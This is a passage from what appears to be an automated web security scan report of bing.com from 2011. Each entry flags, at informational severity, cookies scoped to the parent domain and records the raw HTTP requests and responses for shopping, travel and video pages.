Date: Wed, 02 Feb 2011 15:44:02 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E1A7F5BA7644A2BAA06833125336168; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:02 GMT; domain=.bing.com; path=/

Ref A: CD471770148240C79982106E3196FBEA Ref B: 0C751A30A3996A3A2BBDCAC1C65B761F Ref C: Wed Feb 02 07:44:02 2011
PST

11.285. http://www.bing.com/shopping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=174B2CCBF11A4337B3CF5638612D64AA; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping?FORM=SHOPH2 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:02 GMT
Connection: close
Set-Cookie: _SS=SID=174B2CCBF11A4337B3CF5638612D64AA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 49D088005C31488781F05864A51CD0E0 Ref B: 1FEE72B1922FFBCA72900903677E5007 Ref C: Wed Feb 02 07:44:01 2011
PST

11.286. http://www.bing.com/shopping/pet-beds/c/5533 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/pet-beds/c/5533

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=835633C5B9E34FC3BD3136F7AE025813; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/pet-beds/c/5533?q=dog+beds&vw=gr&FORM=SHOPH1&crea=020111dogbed HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=835633C5B9E34FC3BD3136F7AE025813; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 48D640698C34460DAAE41C3C67FB7747 Ref B: 44985E63E580B6F7BBB1992CC1B8CE47 Ref C: Wed Feb 02 07:44:01 2011
PST

11.287. http://www.bing.com/shopping/photo-storage-presentation/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/photo-storage-presentation/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=75FB9386DCDD4B3784025AB4615440AB; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/photo-storage-presentation/search?q=digital%20photo%20frame&p1=%5bCommerceService%20scenario%3d%22f%22%20r%3d%22leafcategoryid%7c4385%2cpricelow%7c0%2cpricehigh%7c25%22%5d&vw=gr&FORM=SHOPH1&crea=020111frames HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=75FB9386DCDD4B3784025AB4615440AB; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 9E4B693C63534AEC8EFC1CE11CF26677 Ref B: 6406D7D09DA422FFDA115320BAAB01E1 Ref C: Wed Feb 02 07:44:01 2011
PST

11.288. http://www.bing.com/shopping/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=0D67D29194BA45D69B3158AB22258F94; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=0D67D29194BA45D69B3158AB22258F94; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 34F80D9B975C49DE99B9E8D01C5CCE3D Ref B: 16662B1C5A04E819A85AA80B47D2B989 Ref C: Wed Feb 02 07:44:01 2011
PST

11.289. http://www.bing.com/shopping/televisions/c/4724 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/televisions/c/4724

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=105E83DD783E4EBF96A309947C7C28C6; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/televisions/c/4724?q=flat+screen+tv&vw=gr&FORM=SHOPH1&crea=020111TVs HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=105E83DD783E4EBF96A309947C7C28C6; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: A044AA7210B64A8095686515EB0FACF0 Ref B: F4E0CF88203B93940C3E52E56446540E Ref C: Wed Feb 02 07:44:01 2011
PST

11.290. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/valentines-day-gift-ideas/r/144

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=3E69B16A4036442C8750E36A24D9491D; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:00 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/valentines-day-gift-ideas/r/144 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:00 GMT
Connection: close
Set-Cookie: _SS=SID=3E69B16A4036442C8750E36A24D9491D; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:00 GMT; domain=.bing.com; path=/

Ref A: 367A39370974491D8EC7128B234EA825 Ref B: 1F8AC254D8EDFEE1F8710C039C017CCC Ref C: Wed Feb 02 07:44:00 2011
PST

11.291. http://www.bing.com/shopping/womens-workout-clothing/r/146 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/womens-workout-clothing/r/146

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=80438C118EA246A18DDC72E701D38668; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/womens-workout-clothing/r/146?FORM=SHOPH1&crea=020111workoutwear HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:44:01 GMT
Connection: close
Set-Cookie: _SS=SID=80438C118EA246A18DDC72E701D38668; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625264&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:44:01 GMT; domain=.bing.com; path=/

Ref A: 66F8F61938BD49A3B180BCB2435C3E8E Ref B: 7C7201EFEF67BB311F76467F0580E930 Ref C: Wed Feb 02 07:44:01 2011
PST

11.292. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=B9FD2F05CE624E8D8225D133EB9C4444; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2b76bfd18f8b4505beb02a52509d49a9; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:38 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/content/search?q=Indoor+Water+Parks%3a+Wilderness+Territory+Waterpark+Resort&cid=msntab1176403&FORM=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.293. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/deals/cheap-flights-to-las-vegas.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=AF7DBFF440CB4C92B41FAE4F6A61250D; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:51 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/cheap-flights-to-las-vegas.do?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:51 GMT
Connection: close
Set-Cookie: _SS=SID=AF7DBFF440CB4C92B41FAE4F6A61250D; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:51 GMT; domain=.bing.com; path=/

Ref A: A3BFA36425D94370B7B6306334C1ACD8 Ref B: 515AD692CE0335B6277C1A30A8375574 Ref C: Wed Feb 02 07:43:51 2011
PST

11.294. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=27FE84C2DCDE46E1930C9C9FE31D1EA9; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:52 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/orlando-florida-hotels-hostels-motels-1004643?qpvt=orlando+hotels&q=orlando+hotels&cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:52 GMT
Connection: close
Set-Cookie: _SS=SID=27FE84C2DCDE46E1930C9C9FE31D1EA9; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:52 GMT; domain=.bing.com; path=/

Ref A: 856ADD0ECD934AEAAB8686D00359423E Ref B: CFF6F7BD182B7180D1F1A7EEDD75B386 Ref C: Wed Feb 02 07:43:52 2011
PST

11.295. http://www.bing.com/travel/hotels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/hotels

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=5FF4597C29944F46AD1E896475146096; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:53 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/hotels?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Wed, 02 Feb 2011 15:43:53 GMT
Connection: close
Set-Cookie: _SS=SID=5FF4597C29944F46AD1E896475146096; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:53 GMT; domain=.bing.com; path=/

Ref A: D21EFBC22FA94566A9345B8A941F116A Ref B: 5EF405CAC3BECA319DBF4BD733C05E5F Ref C: Wed Feb 02 07:43:53 2011
PST

11.296. http://www.bing.com/videos/browse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

from=en-us_msnhp; domain=.bing.com; path=/videos
_SS=SID=1D8B0FDCCFE14AAF8C689C75E8B4E4C4; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce76641ff25774cb1b1d83ab67d8126d3; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1625263&D=1593447&AF=NOFORM; expires=Fri, 01-Feb-2013 15:43:17 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/browse?from=en-us_msnhp HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

11.297. http://www.bing.com/videos/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Thu, 31-Jan-2013 15:38:48 GMT; domain=.bing.com; path=/videos
_HOP=I=1&TS=1296574728; domain=.bing.com; path=/
_SS=SID=7F4016131B0E4D14A29A3BCD60BA716F; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:48 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 01 Feb 2011 15:38:48 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Thu, 31-Jan-2013 15:38:48 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1296574728; domain=.bing.com; path=/
Set-Cookie: _SS=SID=7F4016131B0E4D14A29A3BCD60BA716F; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:48 GMT; domain=.bing.com; path=/

11.298. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/earthquake-proof-bridge/pfu8x7j

Issue detail

